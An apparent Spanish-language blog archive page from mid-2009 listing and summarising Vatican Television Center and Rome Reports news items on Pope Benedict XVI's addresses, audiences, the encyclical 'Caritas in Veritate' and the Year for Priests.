CTV - Octava Dies : 25-7-09.
10 agosto 2009, 19:26
CTV n. 234 : El Papa, los sacerdotes y Cristo.
10 agosto 2009, 19:21
CTV n. 233 : Papa y nadadores, modelo de sacrificio para sus coetáneos.
10 agosto 2009, 19:17
CTV n. 232 : El sacerdote es instrumento de salvación.
10 agosto 2009, 19:12
CTV n. 231 : Papa, el verdadero poder es la misericordia y el perdón.
10 agosto 2009, 19:05
Selección de artículos.
-
25 julio 2009, 12:56
C-FAM : 24-7-09.
25 julio 2009, 12:51
C-FAM : 17-7-09.
25 julio 2009, 12:47
C-FAM : 10-7-09.
25 julio 2009, 12:30
RIES n. 142 : 22-7-09.
25 julio 2009, 12:23
RIES n. 141 : 14-7-09.
25 julio 2009, 12:15
RIES - Podcast n. 19 : 18-7-09.
25 julio 2009, 11:58
Rome Reports n. 156-165 : 22-7-09.
25 julio 2009, 11:52
Rome Reports n. 143-155 : 15-7-09.
25 julio 2009, 11:43
Rome Reports n. 133-142 : 8-7-09.
25 julio 2009, 11:35
CTV - Octava Dies : 18-7-09.
-
14 julio 2009, 20:08
CTV - Octava Dies : 11-7-09.
14 julio 2009, 19:47
CTV n. 230 : Papa : diálogo y reconciliación para Honduras.
14 julio 2009, 19:43
CTV n. 229 : Benedicto XVI : superar la cultura materialista.
14 julio 2009, 19:39
CTV n. 228 : La fe es importante para el desarrollo en México.
14 julio 2009, 19:35
CTV n. 227 : Benedicto XVI recibe a las primeras damas.
14 julio 2009, 19:31
CTV n. 226 : La humanidad es una única familia.
14 julio 2009, 19:26
CTV n. 225 : Buenas relaciones entre la Santa Sede y Japón.
14 julio 2009, 19:21
CTV n. 224 : Benedicto XVI : la economía necesita de la ética.
14 julio 2009, 19:14
CTV n. 223 : Caridad y verdad, esencia de la revelación.
14 julio 2009, 19:10
CTV n. 222 : Solidaridad internacional para Haití.
14 julio 2009, 19:06
CTV n. 221 : Papa : la gracia de Cristo transforma y renueva.
14 julio 2009, 19:02
CTV n. 220 : El Papa : confianza y esperanza, bases de las vocaciones.
14 julio 2009, 18:57
CTV n. 219 : El Papa pide a los metropolitanos : sed pastores entregados.
14 julio 2009, 18:54
CTV n. 218 : Benedicto XVI : hombres nuevos con San Pablo.
14 julio 2009, 18:46
CTV n. 217 : Papa : "El sacerdote es un hombre del Señor".
14 julio 2009, 18:27
CTV n. 216 : Benedicto XVI impone el palio a 34 arzobispos.
14 julio 2009, 18:24
CTV n. 215 : Benedicto XVI : la Iglesia ayuda a la promoción humana.
14 julio 2009, 18:20
CTV n. 214 : Benedicto XVI : el diálogo ecuménico progresa.
14 julio 2009, 18:17
CTV n. 213 : El Papa pide de nuevo paz en Oriente Medio.
14 julio 2009, 18:10
CTV n. 212 : El sacerdocio es un don.
14 julio 2009, 18:05
CTV n. 211 : Sólo Dios puede vencer el poder del mal.
14 julio 2009, 18:01
CTV n. 210 : Papa : el corazón de Dios arde de compasión.
14 julio 2009, 17:57
CTV n. 209 : Benedicto XVI : los políticos cristianos son necesarios.
14 julio 2009, 17:53
CTV n. 208 : Benedicto XVI : rezo por los cristianos en Iraq.
11 julio 2009, 20:57
Rome Reports n. 123-132 : 1-7-09.
11 julio 2009, 20:52
Rome Reports n. 114-122 : 24-6-09.
11 julio 2009, 20:43
Rome Reports n. 103-113 : 17-6-09.
10 julio 2009, 20:00
Informes y Monográficos 2008-09 : 1 marzo - 10 julio.
jueves, agosto 27, 2009, 03:33 PM - Organismos Internacionales
CTV núm. 239.
Es indispensable convertir el modelo actual de desarrollo global hacia una asunción de responsabilidades en relación a lo creado: lo solicita no sólo las emergencias ambientales, sino también el escándalo del hambre y de la miseria. Éste ha sido el llamamiento pronunciado esta mañana por Benedicto XVI quien ha focalizado la catequesis de hoy de la audiencia general, sobre la tutela del ambiente. Una asunción de responsabilidades que tiene que ser asumida por cada individuo, así como por la sociedad en su conjunto. El Papa ha pensado, en particular, en los líderes de los gobiernos y de las agencias internacionales que en breve se reunirán en las Naciones Unidas para discutir el urgente problema del cambio climático, etc ...
Continuación ...
jueves, agosto 27, 2009, 03:29 PM - Homilías y Celebraciones Litúrgicas
CTV núm. 238.
Jesús no se contenta con una pertenencia superficial y formal, por el contrario, es necesario formar parte, durante toda la vida, de su pensamiento y su voluntad. La parte conclusiva del cuarto capítulo del Evangelio de Juan ha servido de fondo a la reflexión de hoy de Benedicto XVI durante el rezo del Angelus. De hecho, hoy como ayer, muchos permanecen escandalizados ante la paradoja de la fe cristiana. La enseñanza de Jesús ha precisado el Papa- parece dura, demasiado difícil de acoger y poner en práctica. Por eso está quien rechaza y abandona a Cristo; o quien quiere adaptar la palabra a la moda de los tiempos perdiendo su significado y valor ...
Continuación ...
jueves, agosto 27, 2009, 03:25 PM - Audiencias, Mensajes y Discursos
CTV núm. 237.
La formación de los sacerdotes es esencial para concretizar una nueva evangelización. Lo dijo el Papa en la catequesis de la audiencia general hoy en el palacio apostólico de Castelgandolfo, ante unos 3000 fieles. Benedicto XVI presentó la figura del Santo de hoy, el francés San Juan Eudes que, en la Francia del 1600, marcada por fenómenos religiosos contrapuestos y por el desprecio de la fe cristiana por parte de algunas corrientes de pensamiento dominantes en la época, instituyó una Congregación dedicada específicamente a la formación de los sacerdotes. Consciente de la necesidad de ayuda espiritual de los fieles, incluso por la falta de carisma de muchos sacerdotes ...
Continuación ...
miércoles, agosto 19, 2009, 05:27 PM - Homilías y Celebraciones Litúrgicas
CTV núm. 236.
En el Angelus dominical que Benedicto XVI ha recitado en el patio del Palacio Apostólico de Castelgandolfo con un nutrido grupo de fieles, nuevamente ha hablado de María en relación al Evangelio que San Juan nos propone en la liturgia del día. Juan, de hecho, retoma las palabras de Jesús: Yo soy el pan vivo que ha bajado del cielo; el que coma de este pan vivirá para siempre. Y el pan que yo daré es mi carne para la vida del mundo. Dios, ha dicho el Papa, ha necesitado de María para asumir el cuerpo humano, para entrar en nuestra condición mortal, y aquel cuerpo se nos dona, en el sacramento de la Eucaristía, como instrumento de vida eterna ...
Continuación ...
miércoles, agosto 19, 2009, 05:24 PM - CM - Cultorum Martyrum
CTV núm. 235.
A los numerosos fieles reunidos en el patio del palacio apostólico de Castelgandolfo para participar en el Angelus dominical, Benedicto XVI ha dirigido un saludo, recordando, también esta semana, las figuras de los santos que la Iglesia evoca en estos días. En particular el Papa se ha referido a la figura de los mártires recordados en la liturgia de estos días, santa Teresa Benedicta de la Cruz - Edith Stein - y san Maximiliano Kolbe, ambos perecieron en un campo de concentración, y algunas figuras de los mártires de la Iglesia de Roma como san Poncio Papa, san Hipólito y san Lorenzo diácono. Ellos nos muestran, ha dicho el Papa, el verdadero rostro de Dios ...
Continuación ...
domingo, agosto 9, 2009, 04:47 PM - RR - Rome Reports
29 julio 2009.
Angelus : el papa pide que se valore la función de los abuelos.
Tras el accidente, el Papa utiliza una grabadora para avanzar en su próximo libro.
Benedicto XVI visita la catedral de Aosta.
Se cumplen 150 años de la muerte del Cura de Ars.
Mensaje del Vaticano para el Día Mundial del Turismo.
"Caritas in Veritate" : el hombre como motor de la economía.
Consejos para invertir éticamente.
El Archivo Secreto Vaticano a golpe de click.
Los artículos religiosos más vendidos en Roma.
Así es el Museo de las Almas del Purgatorio.
Passetto di Borgo, el pasadizo secreto de los papas.
Continuación ...
domingo, agosto 9, 2009, 04:43 PM - CTV - Centro Televisivo Vaticano
25 julio 2009.
Noticias. La sonrisa del Papa. La fe y el cosmos. El abrazo de Bernini. La biblioteca camino de la reapertura.
Editorial : ¿ Quién es el hombre al que hay que servir ?. Encíclica de Benedicto XVI, "Caritas in Veritate" : ética y economía, defensa de la vida y visión de la sexualidad y la familia en la doctrina social de la iglesia ...
Agenda. El Papa en Castelgandolfo ...
Continuación ...
domingo, agosto 9, 2009, 04:39 PM - Audiencias, Mensajes y Discursos
CTV núm. 234.
Que la Virgen María, Madre de la Iglesia, ayude a los sacerdotes (...), siguiendo el ejemplo de los modelos de santidad sacerdotal que la Iglesia recuerda en estos primeros días de agosto. Así se ha expresado el Papa esta mañana, antes de la oración mariana del Angelus, recitada por primera vez este verano desde Castelgandolfo. Tras haber agradecido una vez más a los fieles que han demostrado cercanía espiritual cuando en Les Combes sufrió el pequeño accidente en la muñeca derecha, Benedicto XVI ha recordado a algunos santos, verdaderos modelos de espiritualidad y dedicación sacerdotal. Entre ellos ha mencionado a san Francisco de Asís ...
Continuación ...
domingo, agosto 9, 2009, 04:35 PM - Audiencias, Mensajes y Discursos
CTV núm. 233.
Sed campeones en el deporte y en la vida, porque como atletas sois modelos para vuestros coetáneos, y vuestro ejemplo puede ser para ellos determinante en la construcción positiva de su futuro. Éstas han sido las palabras que el Papa ha dirigido esta mañana a una representación de atletas que participan en los mundiales de natación de Roma. En total unas 700 personas han encontrado al Pontífice en el patio del palacio apostólico de Castelgandolfo, entre ellos, el presidente de la Federación Internacional de Natación Julio Maglione quien ha definido este décimo tercer mundial de natación, como el mejor de la historia. Con vuestras competiciones ofrecéis al mundo un espectáculo de disciplina ...
Continuación ...
domingo, agosto 9, 2009, 04:32 PM - Homilías y Celebraciones Litúrgicas
CTV núm. 232.
Se esperaba con entusiasmo la cita con el Angelus de este domingo 26 de julio en Les Combes, la localidad en la que Benedicto XVI se encuentra en este periodo de vacaciones. El obispo de Aosta, monseñor Giuseppe Anfossi, tras haber celebrado a las 10.20 la Santa Misa, ha saludado al Santo Padre dándole la bienvenida en nombre de la diócesis de Aosta y de todos aquellos que han acudido desde lejos para no faltar a esta cita con el Papa, agradeciéndole además la visita del pasado viernes a la catedral de Aosta, donde el Santo Padre presidió la celebración de las Vísperas. Antes de recitar la oración mariana, el Papa ha analizado un pasaje del Evangelio de san Juan de la liturgia de hoy, ...
Continuación ...
domingo, agosto 9, 2009, 04:28 PM - Homilías y Celebraciones Litúrgicas
CTV núm. 231.
Cristo sufrió para salvar al mundo porque existe un océano de mal, de odio y de injusticia, y las muchas víctimas de este mal tienen derecho a un río de bondad, verdad y amor más grande que las injusticias. Es el corazón de la homilía improvisada de Benedicto XVI el viernes por la tarde en la catedral de Aosta, durante la celebración de las vísperas. Ante 400 personas, entre sacerdotes, religiosos y laicos de la diócesis de Aosta, el Papa comentó la oración conclusiva de las vísperas, recordando que en su última encíclica Caritas in veritate, ha querido demostrar la prioridad de Dios en la vida personal de los hombres y en la historia. Sin embargo, la omnipotencia de Dios no va contra nuestra libertad ...
Continuación ...
domingo, agosto 9, 2009, 04:21 PM - Agencias de Noticias
sábado, julio 25, 2009, 10:57 AM - RR - Rome Reports
22 julio 2009.
El Papa se recupera tras operarse la muñeca.
El Papa agradece las manifestaciones de afecto.
Un sacerdote llamado Karol Wojtyla.
Archidiócesis de Sidney impulsa la investigación con células madre adultas.
Piden a la FIFA que permita gestos religiosos en los estadios.
“Caritas in Veritate” une justicia social y respeto a la vida.
Católicos y Anglicanos comparten el legado de Newman.
La casa de los santos Juan y Pablo.
Los mejores bocadillos del Vaticano.
Un musical sobre la vida de San Pablo.
Continuación ...
sábado, julio 25, 2009, 10:54 AM - RR - Rome Reports
15 julio 2009.
El Papa y Obama abren nueva era en las relaciones Vaticano - EE.UU.
Benedicto XVI recibe a las esposas de los líderes del G-8.
El Primer Ministro Japonés regala una cámara de vídeo al Papa.
El Primer Ministro de Australia regala vino al Papa.
El Primer Ministro de Canadá visita a Benedicto XVI.
Benedicto XVI pide a los universitarios que sean valientes.
Comienzan las vacaciones del Papa.
Así ayuda una voluntaria pro-vida.
Juan Pablo II y Benedicto XVI en los medios de comunicación.
La Biblia más antigua del mundo, ya está en Internet.
El Vaticano conserva roca lunar del primer viaje a la luna.
Iconos de bronce por primera vez en Roma.
Sidney celebra primer aniversario de la Jornada Mundial de la Juventud.
Continuación ...
sábado, julio 25, 2009, 10:51 AM - RR - Rome Reports
8 julio 2009.
Benedicto XVI publica su tercera encíclica.
El Papa pide al G-8 ayudas concretas para los pobres.
Una estatua de Juan Pablo II en el hospital Gemelli.
El Cardenal Newman será beatificado este año.
Vaticano publica las actas del proceso a Galileo Galilei.
El nuevo responsable de la Comisión Teológica Internacional.
Ordenados 38 diáconos de los Legionarios de Cristo.
El Papa autoriza que se abra la tumba de San Pablo.
Las representaciones más antiguas de San Pablo.
Restaurados los últimos frescos de Miguel Angel.
Continuación ...
sábado, julio 25, 2009, 10:41 AM - CTV - Centro Televisivo Vaticano
18 julio 2009.
Noticias. Las vacaciones de Benedicto XVI. Veinte siglos de una certeza. Por los caminos del mundo. El Leccionario Farnese en el Vaticano.
Editorial : El Papa, la luna y la tecnología. 40 aniversario del primer alunizaje del Apolo XI de la NASA (EE.UU.). El G-8 en L´Aquila (Italia) y la crisis política de Honduras.
Agenda. Rezo del Angelus con el Papa ...
Continuación ...
martes, julio 14, 2009, 05:30 PM - CTV - Centro Televisivo Vaticano
11 julio 2009.
Noticias. "Caritas in Veritate" y la confianza en el hombre. La policromía de la fe. Religiosas en la red anti-esclavos. Con San Francisco en Brasil. El Papa y el apóstol.
Editorial : Desarrollo, gratuidad y esperanza. Mensaje de la nueva encíclica de Benedicto XVI. Audiencia. El Presidente de EE.UU. con Benedicto XVI, y recepción con el primer ministro de Japón.
Agenda. Periodo de descanso estival del Papa en el valle de Aosta. Misa presidida por el Secretario de Estado y rezo del Angelus con Benedicto XVI.
Continuación ...
martes, julio 14, 2009, 02:13 PM - Audiencias, Mensajes y Discursos
CTV núm. 230.
Queridos amigos : durante estos días sigo con viva preocupación los acontecimientos en Honduras. Hoy, querría invitaros a rezar por este querido país para que, con la intercesión materna de Nuestra Señora de Suyapa, los responsables de la nación y todos sus habitantes recorran pacíficamente el camino del diálogo, de la comprensión recíproca y de la reconciliación. Esto sólo será posible si, superando las tendencias particulares, cada uno se esfuerza por buscar la verdad y perseguir con tenacidad el bien común; esta es la condición para asegurar una convivencia pacífica y una vida democrática auténtica. Al amado pueblo hondureño le aseguro mis oraciones e imparto una especial Bendición Apostólica.
Continuación ...
martes, julio 14, 2009, 02:08 PM - Universidades, Seminarios, Institutos y Academias Pontificias
CTV núm. 229.
Benedicto XVI pidió a los universitarios un compromiso misionero con los otros estudiantes que no conocen o no aceptan a Cristo. Encontrando a los 15.000 jóvenes reunidos en Roma para la primera cita europea de los estudiantes universitarios, el Papa reafirmó que el encuentro con Cristo nace de la novedad del corazón, capaz de dar una dirección nueva a la existencia personal; sólo así se vuelve fermento y levadura de una sociedad vivificada por el amor evangélico. En la Universidad la presencia cristiana es siempre más exigente y al mismo tiempo más fascinante, porque la fe está llamada, como en los siglos pasados, a ofrecer su insustituible servicio al conocimiento, en la sociedad contemporánea ...
Continuación ...
martes, julio 14, 2009, 02:04 PM - Embajadas y Gobiernos
CTV núm. 228.
La Iglesia colabora con el estado mexicano y reafirma que la libertad religiosa es un derecho fundamental de la persona, necesaria para el desarrollo armónico de la sociedad. Lo ha observado Benedicto XVI en el discurso dirigido a Héctor Federico Ling Altamirano, nuevo embajador de México ante la Santa Sede. El Papa subrayó la importancia de la fe cristiana en el desarrollo histórico de México, que contribuye a una cultura que se basa en las ideas de justicia, paz, reconciliación, tutela de la vida humana e importancia del trabajo. El Papa enfatizó la importancia de la familia como núcleo base de la sociedad, deseó que tengan éxito los esfuerzos por parte del gobierno para contrastar la violencia ...
Continuación ...
martes, julio 14, 2009, 01:58 PM - Embajadas y Gobiernos
CTV núm. 227.
Al terminar la audiencia general Benedicto XVI ha encontrado a las consortes de algunos líderes políticos presentes en Italia en estos días por la cumbre del G-8, en la que se han unido la presidente del Ifad, el fondo ONU para el desarrollo, y la mujer del presidente de la Comisión Europea. Al finalizar la catequesis, el Papa ha invitado a rezar por la cumbre. La exhortación se ha hecho en italiano, francés y se ha repetido de forma más amplia en inglés. El pontífice ha invitado a rezar por todas las personas al servicio de la política y del gobierno de la economía y en especial por los jefes de Estado y de gobierno reunidos en Italia por la cumbre del G-8.
Continuación ...
martes, julio 14, 2009, 01:53 PM - Audiencias, Mensajes y Discursos
CTV núm. 226.
La caridad en la verdad es la principal fuerza propulsiva para el verdadero desarrollo. Con estas palabras Benedicto XVI ha presentado la encíclica "Caritas in Veritate" a todos aquellos que se han reunido en el aula Pablo VI para la audiencia general. El Papa ha aclarado que el texto, en la linea de la "Populorum Progressio" de Pablo VI, no intenta ofrecer soluciones técnicas a las muchas problemáticas sociales que hoy afligen el mundo, sino más bien llamar a los principios fundamentales para un verdadero desarrollo humano. El pontífice de esta forma ha enumerado el cuidado a la vida del hombre, el respeto de los derechos a la libertad religiosa ...
Continuación ...
martes, julio 14, 2009, 01:47 PM - Embajadas y Gobiernos
CTV núm. 225.
El Santo Padre ha recibido en audiencia, en la mañana del pasado martes, al primer ministro de Japón, Taro Aso. Sucesivamente, el primer ministro ha encontrado al secretario de Estado, el cardenal Tarcisio Bertone, acompañado de monseñor Dominique Mamberti, Secretario para las Relaciones con los Estados. En estos coloquios se han tratado algunos temas de actualidad internacional con particular atención a la crisis económica y al compromiso de Japón y de la Santa Sede hacia Africa. Sobre el plan bilateral se han evocado las buenas relaciones que existen entre Japón y la Santa Sede, y también el acuerdo y la cooperación entre Iglesia y Estado.
Continuación ...
martes, julio 14, 2009, 01:35 PM - Encíclicas de Benedicto XVI
CTV núm. 224.
La economía necesita de la ética, como lo demuestra la imposición de una finanza ética y de los sistemas de microcrédito y microfinanciación. En las intervenciones para el desarrollo se debe considerar en primer lugar la centralidad de la persona humana, mientras las organizaciones internacionales deben cuestionarse la eficacia de su propio equipo de cooperación en relación a los fines que persiguen. Este es uno de los pasajes centrales de la nueva encíclica de Benedicto XVI, "Caritas in Veritate", que ha sido publicada hoy y firmada por el Papa en los días anteriores. El modo como el hombre trata el medio ambiente, refleja también el modo como se trata así mismo : el libro de la naturaleza ...
Continuación ...
martes, julio 14, 2009, 01:26 PM - IP - Iustitia et Pax
CTV núm. 223.
Caridad y verdad son el origen de la Doctrina Social. Lo ha mencionado el Cardenal Renato Raffaele Martino, presidente del Consejo Pontificio para la Justicia y la Paz, al presentar en la oficina de prensa la encíclica de Benedicto XVI. En el título de "Caritas in Veritate" aparecen los dos términos fundamentales del Magisterio de Benedicto XVI. Estos dos términos han marcado todo su Magisterio en estos años de su pontificado, y representan la esencia misma de la revelación cristiana. Éstas a su vez son el motivo fundamental de la dimensión histórica y pública del cristianismo. Monseñor Giampaolo Crepaldi, secretario del Consejo Pontificio para la Justicia y la Paz, ha señalado la novedad ...
Continuación ...
martes, julio 14, 2009, 01:05 PM - Embajadas y Gobiernos
CTV núm. 222.
Benedicto XVI desea que continúe la solidaridad internacional para Haití, un país marcado por la pobreza y las catástrofes naturales. Benedicto XVI observó, en el discurso dirigido al nuevo enviado plenipotenciario ante la Santa Sede Carl H. Guiteau, que precisamente los destrozos naturales han llevado a una toma de conciencia sobre la importancia del respeto ambiental. La explotación desconsiderada de los recursos de la creación y las consecuencias de ello, que afligen a los pobres, pueden enfrentarse con opciones económicas y políticas y con una cooperación internacional real. Entre los motivos de esperanza el Papa citó el respeto por la vida, la unión de la familia, la fe en Dios ...
Continuación ...
martes, julio 14, 2009, 12:58 PM - Homilías y Celebraciones Litúrgicas
CTV núm. 221.
Pedro y Pablo son maestros de fe, con su testimonio invitan a meditar en profundidad, en silencio, el misterio de la Cruz, que acompaña a la Iglesia hasta el final de los tiempos, y a acoger la luz de la fe. De este modo habló ayer Benedicto XVI, presidiendo la celebración de las vísperas en ocasión de la reapertura de la capilla Paulina. Destinada a la exposición del Santísimo, y desde siempre lugar de culto del Papa y de la Familia Pontificia, la capilla emana un único himno a la victoria de la vida y de la gracia sobre la muerte y el pecado. El Papa ha dedicado de este modo su homilía a las figuras de Pedro y Pablo ...
Continuación ...
martes, julio 14, 2009, 12:44 PM - Conferencias Episcopales
CTV núm. 220.
Sean sembradores de confianza y de esperanza; sólo así crecerán vocaciones en la Iglesia. Lo subrayó Benedicto XVI durante el Congreso internacional sobre las vocaciones en Europa organizado por el Consejo de las Conferencias Episcopales Europeas y por el Centro Nacional Vocacional Italiano. Los jóvenes - dijo el Papa - están desorientados e impacientes por su futuro. Y, sin embargo, ésta puede ser la hora de Dios: su llamada, mediada por la fuerza y la eficacia de la Palabra, genera un camino de esperanza hacia la plenitud de la vida. El Año Sacerdotal ofrece una bella oportunidad para encontrar de nuevo el sentido profundo de la pastoral vocacional, que tiene que basarse en el testimonio ...
Continuación ...
martes, julio 14, 2009, 12:38 PM - Audiencias, Mensajes y Discursos
CTV núm. 219.
El Papa Benedicto XVI ha encontrado a los nuevos arzobispos metropolitanos a los cuales ha impuesto el palio en la fiesta de los santos apóstoles Pedro y Pablo. En la audiencia realizada en el aula Pablo VI, el Papa - que ha pronunciado un discurso en varios idiomas - se ha detenido en el amor por Cristo que es la fuente del ministerio episcopal. Benedicto XVI ha recordado que el palio simboliza la unión de los pastores con el sucesor de Pedro, como también la solicitud pastoral que el arzobispo tiene por su pueblo. Estamos al inicio del Año Sacerdotal, ha dicho el Papa, por lo tanto luchad por ser pastores ejemplares, entregados y llenos de amor por el Señor y por sus comunidades; podreis así guiar ...
Continuación ...
martes, julio 14, 2009, 12:31 PM - Homilías y Celebraciones Litúrgicas
CTV núm. 218.
El apóstol Pablo nos exhorta a ser hombres nuevos para un mundo nuevo, renovado y mejor. Es el encuentro con Cristo lo que produce el cambio. Lo ha mencionado Benedicto XVI en su homilía durante la Víspera del domingo, en la Basílica de San Pablo Extramuros como parte de la celebración del Año Paulino. Debemos aprender a pensar con mayor profundidad. El significado de ésto lo dice San Pablo en la segunda parte de la frase: Es necesario aprender a comprender la voluntad de Dios, de modo que ésta plasme nuestra voluntad. Para que nosotros mismos deseemos lo que Dios quiere, para que reconozcamos que lo que Dios quiere es lo mejor y lo bueno. Se trata por lo tanto, de reflexionar profundamente ...
Continuación ...
martes, julio 14, 2009, 12:24 PM - Audiencias, Mensajes y Discursos
CTV núm. 217.
"El sacerdote es un hombre del Señor porque Dios mismo lo ha llamado y lo ha constituido en su servicio apostólico".
Benedicto XVI invitó a todos los fieles reunidos en la plaza san Pedro a rezar por el año sacerdotal que recientemente fue inaugurado con ocasión del 150 aniversario de la muerte del santo Cura de Ars. Doce meses durante los cuales cada sacerdote tendrá la oportunidad de redescubrir su vocación y el marco de sus tareas. "Cuando no se es consciente del díptico consagración-misión, aclaró el pontífice durante la catequesis, se vuelve realmente difícil comprender la identidad del presbítero y su ministerio en la Iglesia". Este es el motivo de la invitación para que en las diócesis, parroquias, comunidades religiosas, asociaciones y movimientos se multipliquen en los próximos meses "iniciativas de oración y en particular, de adoración eucarística para la santificación del clero y las vocaciones sacerdotales". "Quien reza no tiene miedo, concluyó el Papa, al recordar cómo la oración es el compromiso, el verdadero camino de santificación de los sacerdotes, quien reza no está nunca solo, quien reza se salva".
Continuación ...
Anterior Siguiente


Agregar a Favoritos
Página de Inicio
Recomiende el Sitio
Suscribir fuente RSS
Ver encabezados
Añadir a iGoogle


Video pocket para PC
Jesús de Nazareth











